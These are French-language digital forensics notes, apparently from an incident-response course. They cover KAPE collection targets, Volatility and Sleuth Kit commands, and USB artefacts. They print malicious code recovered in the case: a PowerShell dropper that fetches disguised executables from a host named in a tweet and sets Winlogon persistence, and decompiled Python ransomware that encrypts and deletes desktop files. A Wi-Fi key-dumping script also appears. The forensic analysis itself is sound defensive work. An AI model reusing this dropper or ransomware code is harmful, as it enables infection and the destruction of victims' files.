       Path: C:\Windows*\system32\grouppolicy\*.pol

       IsDirectory: false

       Recursive: false

   -

       Name: Local Group Policy Files - Startup/Shutdown Scripts

       Category: Communication

       Path: C:\Windows*\system32\grouppolicy\*\Scripts

       IsDirectory: true

       Recursive: true

EventLogs-RDP

Description: Collect Win7+ RDP related Event logs

Author: Mark Hallman

Version: 1

Id: 2e79fc64-816c-439a-8b7f-93dd59bf2711

RecreateDirectories: true

Targets:

   -

       Name: Event logs Win7+

       Category: EventLogs

       Path: 'C:\Windows*\system32\winevt\logs\System.evtx'

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Event logs Win7+

       Category: EventLogs

       Path: 'C:\Windows*\system32\winevt\logs\Security.evtx'

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Event logs Win7+

       Category: EventLogs

       Path: 'G:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx'

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Event logs Win7+

       Category: EventLogs

       Path: 'G:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx'

       IsDirectory: false

       Recursive: false

       Comment: ""

BCD

Description: Boot Configuration Files

Author: Troy Larson

Version: 1

Id: eedec61a-bae4-4e96-a2cd-b6b30aa5a786

RecreateDirectories: true

Targets:

   -

       Name: BCD

       Category: Registry

       Path: C:\Boot\BCD

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: BCD Logs

       Category: Registry

       Path: C:\Boot\BCD.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

WindowsTimeline

Description: ActivitiesCache.db collector

Author: Lee Whitfield

Version: 1

Id: 8315040f-c9a4-455a-b02c-96372583f436

RecreateDirectories: true

Targets:

   -

       Name: ActivitiesCache.db

       Category: FileFolderAccess

       Path: C:\Users\*\AppData\Local\ConnectedDevicesPlatform\*\ActivitiesCache.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ActivitiesCache.db-shm

       Category: FileFolderAccess

       Path: C:\Users\*\AppData\Local\ConnectedDevicesPlatform\*\ActivitiesCache.db-shm

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ActivitiesCache.db-wal

       Category: FileFolderAccess

       Path: C:\Users\*\AppData\Local\ConnectedDevicesPlatform\*\ActivitiesCache.db-wal

       IsDirectory: false

       Recursive: false

       Comment: ""

Syscache

Description: syscache.hve

Author: Phill Moore

Version: 1

Id: d4665b13-9953-4cf0-bdc4-6fcb7a37842f

RecreateDirectories: true

Targets:

   -

       Name: Syscache

       Category: Program Execution

       Path: C:\System Volume Information\Syscache.hve

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Syscache transaction files

       Category: Program Execution

       Path: C:\System Volume Information\Syscache.hve.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

Prefetch

Description: Prefetch files

Author: Eric Zimmerman

Version: 1

Id: f6715d3f-b8ca-4cc2-9e5e-4ed18e88abbe

RecreateDirectories: true

Targets:

   -

       Name: Prefetch

       Category: Prefetch

       Path: C:\Windows*\prefetch\*.pf

       IsDirectory: false

       Recursive: false

       Comment: ""

RecentFileCache

Description: Amcache.hve

Author: Eric Zimmerman

Version: 1

Id: 0d93d3fc-1b09-4894-b21f-dddc7f269934

RecreateDirectories: true

Targets:

   -

       Name: RecentFileCache

       Category: ApplicationCompatability

       Path: C:\Windows*\AppCompat\Programs\RecentFileCache.bcf

       IsDirectory: false

       Recursive: false

       Comment: ""

Amcache.hve

Description: Amcache.hve

Author: Eric Zimmerman

Version: 1

Id: 13ba1e33-4899-4843-adf1-c7e6b20d759a

RecreateDirectories: true

Targets:

   -

       Name: Amcache

       Category: ApplicationCompatibility

       Path: C:\Windows*\AppCompat\Programs\Amcache.hve

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Amcache transaction files

       Category: ApplicationCompatibility

       Path: C:\Windows*\AppCompat\Programs\Amcache.hve.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

EvidenceOfExecution

Description: Evidence of execution related files

Author: Eric Zimmerman

Version: 1

Id: 13ba1e33-4899-4843-adf0-c7e6a20d758a

RecreateDirectories: true

Targets:

   -

       Name: Prefetch

       Category: Prefetch

       Path: Prefetch.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RecentFileCache

       Category: ApplicationCompatability

       Path: RecentFileCache.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Amcache

       Category: ApplicationCompatability

       Path: Amcache.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Syscache

       Category: Syscache

       Path: Syscache.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

Childs

$T

Description: $T

Author: Eric Zimmerman

Version: 1

Id: 8c568aa0-9a67-4035-9720-1423770bc29a

RecreateDirectories: true

Targets:

   -

       Name: $T

       Category: FileSystem

       Path: c:\$Extend\$RmMetadata\$TxfLog\$Tops:$T

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       SaveAsFileName: $T

       Comment: ""

$SDS

Description: $SDS

Author: Eric Zimmerman

Version: 1

Id: 72d56db2-b8da-4830-a2e7-37437c90e18f

RecreateDirectories: true

Targets:

   -

       Name: $SDS

       Category: FileSystem

       Path: c:\$Secure:$SDS

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       SaveAsFileName: $Secure_$SDS

       Comment: ""

Description: $MFT

Author: Eric Zimmerman

Version: 1

Id: 2b3d01e2-25e1-4079-a630-6cb6e2069456

RecreateDirectories: true

Targets:

   -

       Name: $MFT

       Category: FileSystem

       Path: C:\$MFT

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       Comment: ""

$LogFile

Description: $LogFile

Author: Eric Zimmerman

Version: 1

Id: b98612e0-f679-400a-954f-c0b2bc86147b

RecreateDirectories: true

Targets:

   -

       Name: $LogFile

       Category: FileSystem

       Path: C:\$LogFile

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       Comment: ""

$J

Description: $J

Author: Eric Zimmerman

Version: 1

Id: 2a9c6f80-250b-42a6-9d29-90cb0a20f7be

RecreateDirectories: true

Targets:

   -

       Name: $J

       Category: FileSystem

       Path: c:\$Extend\$UsnJrnl:$J

       IsDirectory: false

       Recursive: false

       SaveAsFileName: $J

       Comment: ""

   -

       Name: $Max

       Category: FileSystem

       Path: c:\$Extend\$UsnJrnl:$Max

       IsDirectory: false

       Recursive: false

       SaveAsFileName: $Max

       Comment: ""

$Boot

Description: $Boot

Author: Eric Zimmerman

Version: 1

Id: 9f24d727-fcf0-492d-97cc-108472eb4e00

RecreateDirectories: true

Targets:

   -

       Name: $Boot

       Category: FileSystem

       Path: c:\$Boot

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       Comment: ""

Browsers
WebBrowsers

Description: Web browser history, bookmarks, etc.

Author: Eric Zimmerman

Version: 1

Id: e4ffb938-dcc0-4d91-9c77-3aa303d38512

RecreateDirectories: true

Targets:

   -

       Name: Internet Explorer

       Category: Communications

       Path: InternetExplorer.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Chrome

       Category: Communications

       Path: Chrome.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: FireFox

       Category: Communications

       Path: FireFox.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Edge

       Category: Communications

       Path: Edge.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

Edge

Description: Edge

Author: Phill Moore

Version: 1

Id: c72bd45c-2a24-4df9-aa0b-3d7048c90337

RecreateDirectories: true

Targets:

   -

       Name: Edge folder

       Category: Communications

       Path: C:\Users\*\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe

       IsDirectory: True

       Recursive: True

       Comment: ""

   -

       Name: WebcacheV01.dat

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\WebCache

       IsDirectory: Yes

       Recursive: false

       Comment: ""

FireFox

Description: Firefox

Author: Eric Zimmerman

Version: 1.1

Id: 28801734-b95a-47e7-b84f-4ebd0c104862

RecreateDirectories: true

Targets:

   -

       Name: Places

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\places.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Downloads

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\downloads.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Form history

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\formhistory.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Cookies

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\cookies.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Signons

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\signons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Webappstore

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\webappstore.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Favicons

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\favicons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Addons

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\addons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Search

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\search.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Places

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\places.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Downloads

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\downloads.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Form history

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\formhistory.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Cookies

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\cookies.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Signons

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\signons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Webappstore

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\webappstore.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Favicons

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\favicons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Addons

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\addons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Search

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\search.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

Chome

Description: Chrome

Author: Eric Zimmerman

Version: 1.1

Id: a56d0a8f-3229-489e-aea7-353d1f6f9639

RecreateDirectories: true

Targets:

   -

       Name: Chrome bookmarks XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Bookmarks*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Cookies XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Cookies*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Current Session XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Current Session

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Current Tabs XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Current Tabs

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Favicons XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Favicons*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome History XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\History*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Last Session XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Last Session

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Last Tabs XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Last Tabs

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Preferences XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Preferences

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Shortcuts XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Shortcuts*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Top Sites XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Top Sites*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome bookmarks XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Bookmarks*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Visited Links XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Visited Links

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Web Data XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Web Data*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome bookmarks

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Bookmarks*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Cookies

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Cookies*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Current Session

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Current Session

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Current Tabs

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Current Tabs

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Favicons

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Favicons*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome History

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\History*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Last Session

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Last Session

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Last Tabs

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Last Tabs

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Preferences

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Preferences

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Shortcuts

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Shortcuts*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Top Sites

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Top Sites*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome bookmarks

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Bookmarks*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Visited Links

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Visited Links

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Web Data

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Web Data*

       IsDirectory: false

       Recursive: false

       Comment:

InternetExplorer

Description: Internet Explorer

Author: Eric Zimmerman

Version: 1

Id: b1e1d79b-324d-4587-a002-cc81144588ff

RecreateDirectories: true

Targets:

   -

       Name: Index.dat History

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\History\History.IE5\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat History subdirectory

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\History\History.IE5\*\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat temp internet files

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Temporary Internet Files\Content.IE5\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat cookies

       Category: Communications

       Path: C:\Documents and Settings\*\Cookies\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat UserData

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Microsoft\Internet Explorer\UserData\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat Office XP

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Microsoft\Office\Recent\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat Office

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Microsoft\Office\Recent\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Local Internet Explorer folder

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Internet Explorer\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Roaming Internet Explorer folder

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Microsoft\Internet Explorer\

       IsDirectory: true

       Recursive: true

       Comment: ""  

   -

       Name: IE 9/10 History

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\History\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 9/10 Cache

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\Temporary Internet Files\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 9/10 Cookies

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\Cookies\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 9/10 Download History

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\IEDownloadHistory\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 11 Metadata

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\WebCache

       IsDirectory: true

       Recursive: false

       Comment: ""

   -

       Name: IE 11 Cache

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\INetCache\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 11 Cookies

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\INetCookies\

       IsDirectory: true

       Recursive: true

       Comment: ""

ChromeExtentions

Description: Chrome Extension Files

Author: piesecurity

Version: 1

Id: e748b5e3-e279-4e4d-8083-74293e5b6cde

RecreateDirectories: true

Targets:

   -

       Name: Chrome Extension Files

       Category: Communication

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Extensions

       IsDirectory: true

       Recursive: true

   -

       Name: Chrome Extension Files XP

       Category: Communications

       Path: c:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Extensions

       IsDirectory: true

       Recursive: true

Module

Inforensique windows

malware

wmic

wmic useraccount get name,sid

Wifi_forensic.ps1

#Set-ExecutionPolicy Bypass

$wifi=@()


#visualisation des réseaux bloqués

$cmd0= netsh wlan show blockednetworks


#liste des SSID


$cmd1=netsh wlan show profiles

ForEach($row1 in $cmd1)


{

   #recup ssid regex

   if($row1 -match 'Profil Tous les utilisateurs[^:]+:.(.+)$')

   {

       $ssid=$Matches[1]

       $cmd2=netsh wlan show profiles $ssid key=clear

       Foreach($row2 in $cmd2)

       {

           #recup clef wifi

           if($row2 -match 'Contenu de la c[^:]+:.(.+)$')

           {

               $key=$Matches[1]

               #stockage des ssid et clef dans tab

               $wifi+=[PSCustomObject]@{ssid=$ssid;key=$key}

           }

       }

    }

}


#export dans csv

$wifi | export-CSV -Path 'C:\Users\Root\Desktop\wifi.csv' -NoTypeInformation

#visu tableau

$wifi| Sort -Property ssid|Out-GridView -Title 'Clés des SSID du poste'

code wifi

netsh wlan show profiles
netsh wlan show profiles SID key=clear

ADS_forensic.ps1

cls

$BasePath = "D:\case001"


Get-ChildItem -Path $BasePath -Recurse | % {

   $StreamData = $null

   $StreamData = Get-Item -Stream * -Path $_.FullName | ? {$_.Stream -match "Zone.Identifier"} | Get-Content -Stream "Zone.Identifier" | ? {$_ -match "(ZoneId=|ReferrerUrl=|HostUrl=)"}


   if ($StreamData -match "ZoneId=3") {

       Write-Host "`nFound : $($_.FullName)" -ForegroundColor Yellow

       $StreamData | % {Write-Host $_}

   }

}

dropper-twitter.ps1

$wc = New-Object System.Net.WebClient
$h = $wc.DownloadString('https://twitter.com/S1mpleCC')
$x = ($h.Replace("`t","").Replace("`n","").Replace(" ","").Split("<") | ? {$_ -match "class=`"TweetTextSize"} | Select-Object -First 1).Split(">")[1]

(New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/6a992d5529f459a44fee58c733255e86.bat', 'C:\Users\esdacademy\AppData\Local\Google\Chrome\User Data\index.bat')
(New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/76868ae832f6c6bd26cadc7d7c269986.lnk', 'C:\Users\esdacademy\Desktop\Google Chrome.lnk')
(New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/eb6fb390f0c734d59e469525bd84ee18.exe', 'C:\Users\esdacademy\AppData\Local\Google\Chrome\User Data\Default\GoogleUpdaterService.exe')
(New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/cecea6856f21bf30c693534f7f8484dd.exe', 'C:\Users\esdacademy\AppData\Local\Google\Chrome\User Data\Default\GoogleSecurityCheck.exe')
(New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/e91e6348157868de9dd8b25c81aebfb9.xml', 'C:\Users\esdacademy\AppData\Local\Google\Chrome\User Data\security.xml')
(New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/0ba4439ee9a46d9d9f14c60f88f45f87.ps1', 'C:\Users\esdacademy\AppData\Local\Google\Software Reporter Tool\reports\check.ps1')
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" 'explorer.exe, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -file "C:\Users\esdacademy\AppData\Local\Google\Software Reporter Tool\reports\check.ps1"' -Force


outils

HxD Editeur hexa windows
Redline
Zimmerman Tools
Timeline Explorer
Registry Explorer
hash NTLM crack
crackstation
hashkiller
dumpit
extract exe

pour decompiler un exe python

python pyinstxtractor.py ntuser.exe
cd ntuser.exe_extracted/

USB Detective
USBDeview
USB ID
INDXParse.py

python INDXParse -d I30 > deleted.csv

$I parse

Pour recuperer les fichiers dans la corbeille

Natif Iexpress

comme SFX

pestudio
RegRipper.exe
010EditorWin64Installer100.exe
BrowsingHistoryView
Autopsy
Active@ Disk Editor
Arsenal Image Mounter
FTK Imager
  1. ouvrir OVA avec zip
  2. extraire le vmdk
  3. convertir le vmdk en image .dd

VBoxManage.exe clonehd "D:\data stage\infected-disk001.vmdk" "D:\data stage\disque.dd" --format raw

volatility

vol.exe -f mem01.bin imageinfo
set vol=vol.exe -f mem01.bin --profile=WinXPSP2x86
%vol% pslist
%vol% pstree
%vol% psscan
%vol% psxview
%vol% envars | findstr COMPUTERNAME
%vol% hivelist
%vol% printkey -o 0x8b21c008 -K "ControlSet001\Control\ComputerName\ComputerName"
%vol% hashdump

Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John Doe:1000:aad3b435b51404eeaad3b435b51404ee:b9f917853e3dbf6e6831ecce60725930:::

command linux

TSK

liste les disques montés

udisksctl status

On regarde l'offset de démarrage :

mmls /dev/sdb

Utilisation de fls pour naviguer dans la $MFT jusqu'au répertoire ou il y a le binaire compilé de python ntuser.exe

fls  /dev/sdb -o 2048
fls  /dev/sdb -o 2048 17997

Utilisation de icat pour récupéré les données du FILE0 de la $MFT du fichier ntuser.exe :

istat /dev/sdb -o 2048 16492

Utilisation de icat pour extraire le fichier :

icat /dev/sdb -o 2048 16492 >~/ntuser.exe



decompilation code python

Valable que pour décompiler les programme python compilé en exe inférieur version 3.4

pip install uncompyle6

il faut modifier le nombre magique d'un fichier compiler avec python

pour être décompiler avec uncompyle6


Pour cela on regarde le nombre magique d'un fichier pyc puis on le rajoute au debut du ntuserls

xxd abc.pyc |less
xxd ntuser |less

on voit dans un pyc : 00000000: 03f3 0d0a 0000 0000 6300 0000 0000 0000 ........c
alors que dans le ntuser à decompiler : 00000000: 6300 0000 0000 0000 0003 0000 0040 0000 c
printf "\x03\xf3\\x0d\x0a\x00\x00\x00\x00" | cat - ntuser > ntuser.pyc
on décompile
uncompyle6 ntuser.pyc
# uncompyle6 version 3.6.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.14+ (default, Mar 13 2018, 15:23:44) 
# [GCC 7.3.0]
# Embedded file name: ntuser.py
from cryptography.fernet import Fernet
from requests import get
from os import listdir, getcwd, remove
from os.path import isdir
import os, getpass
from bs4 import BeautifulSoup
mode = False

def recurse(path):
   global fn
   global mode
   for i in listdir(path):
       if isdir(path + '\\' + i):
           recurse(path + '\\' + i)
       else:
           if mode == False and i.split('.')[(-1)] == 'cry':
               fn = Fernet(str(raw_input('Password ? ')).encode('utf8'))
               mode = True
           if not mode and i.split('.')[(-1)] != 'cry':
               encrypt(path + '\\' + i)
           else:
               decrypt(path + '\\' + i)


def encrypt(path):
   f = open(path, 'rb')
   f2 = open(path + '.cry', 'w+')
   f2.write(fn.encrypt(f.read()))
   f.close()
   f2.close()
   remove(path)


def set_vbs(vb):
   path = 'C:\\users\\' + getpass.getuser() + '\\appdata\\local\\config'
   if isdir(path):
       f = open(path + '\\aaa.vbs', 'w+')
       f.write(vb.decode('base64'))
       f.close()
   else:
       os.mkdir(path)
       set_vbs(vb)


def get_host():
   r = get('https://twitter.com/S1mpleCC')
   soup = BeautifulSoup(r.text, 'lxml')
   tag = soup.find('p', 'tweet-text')
   return tag.text


host = get_host()
r = get('http://' + host + '/3f792f24bdd299f1c163f2358fb130f9.php').text.encode('utf8')
set_vbs(r.split('x07C82')[0])
fn = Fernet(r.split('x07C82')[1])
recurse('C:\\users\\' + getpass.getuser() + '\\desktop')
# okay decompiling ntuser.pyc

icat

icat /dev/sdb -o 2048 16492 >~/ntuser.exe

istats

istat /dev/sdb -o 2048 16492

fls

fls  /dev/sdb -o 2048
fls  /dev/sdb -o 2048 17997

disque monter

udisksctl status

mount

mount -o loop, ro

Trace

Artefacts USB
Première utilisation / Dernière utilisation
Événements PlugNplay (PnP)

System.evtx

● Le driver Plug and Play tente une installation

● Date et heure de l’installation du driver

● Informations relatives au périphérique

● Numéro de série du périphérique

● Statut PnP (0 = pas d’erreur)


Lorsqu’un driver PnP tente de s’installer sur le système, un événement

(ID 20001) est créé et fourni un statut relatif à cet événement. Il est

important de noter que cet événement n’est pas uniquement lié à

l’USB, mais aussi le firewire, et autres connectiques.



Identification de la clé

● Identification du VID et du PID

● Date et l’heure du branchement


Les périphérique n’ayant pas un numéro de série unique ont un “&” en

second caractère de numéro de série. Les autres numéros de série sont

uniques, ce qui veut dire que le constructeur respecte les normes

internationales.

● SYSTEM\CurrentControlSet\Enum\USBSTOR

● SYSTEM\CurrentControlSet\Enum\USB

Découvrir une lettre associée à un Drive (pluggé à la machine hôte)

Cette technique fonctionne uniquement sur le dernier périphérique

associé sur une lettre. Il n’y a pas d’historique ni de liste de clés

associées à une lettre.

● SYSTEM\CurrentControlSet\Enum\USBSTOR

● SYSTEM\MountedDevices

● SOFTWARE\Microsoft\Windows Portable Devices\Devices


Les fichiers .lnk (raccourcis) contiennent le numéro de série du volume

ainsi que son nom. La clé de registre RecentDocs contient le nom du

Identification du VID et du PID

Date et l’heure du branchement

http://the-sz.com/products/usbid/

Identification de la clé

4. Les artefacts

Artefacts USB


volume lorsque la clé est explorée depuis Explorer. Il ne s’agit pas du numéro

de série de la clé qui est elle codée en dur dans le firmware.

● SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ENDMgmt

Artefacts fichiers supprimés
Corbeille

● Un fichier est séparé en deux fichiers distincts

● Date et heure de suppression

● Nom original du fichier supprimé

● Chemin du fichier supprimé

